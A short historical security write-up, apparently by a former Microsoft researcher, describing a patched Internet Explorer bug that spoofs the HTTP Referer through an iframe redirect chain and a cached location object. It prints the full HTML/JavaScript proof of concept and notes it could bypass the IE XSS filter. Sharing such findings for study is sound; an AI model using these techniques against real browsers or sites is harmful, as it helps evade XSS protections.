Referrer Spoof via Server Redirect and Cached Location Object

After playing around for a while with how IE handles redirect chains inside iFrames, I found a way to fake the HTTP Referer header sent to a destination page. The technique could be used to fully bypass the IE XSS filter, since the filter uses the referrer to determine whether a request is a reflected attack.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Referrer_Spoof_Redirect</title>
</head>
<body>
<script language="JavaScript">
function main()
{
	document.getElementById("myDiv").innerHTML = '<iframe src="redirect.aspx" width="600" height="180"></iframe><br /><br />';
	window[0].setTimeout('Math.l = location; alert("Once Bing loads, click OK"); Math.l.href = 1;');
}
</script>
<div id="myDiv"></div>
</body>
</html>

The iFrame was pointed at redirect.aspx, which redirected to bing.com. Before that redirect completed, a reference to the iFrame’s location object was cached as Math.l. After bing.com loaded, setting Math.l.href = 1 (which resolved through a second redirect to a target URL like whatismyreferer.com) caused the target site to receive bing.com as the HTTP Referer — even though the actual origin was the attacker’s page. The cached location reference bridged the redirect chain in a way that confused the browser’s referrer tracking.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.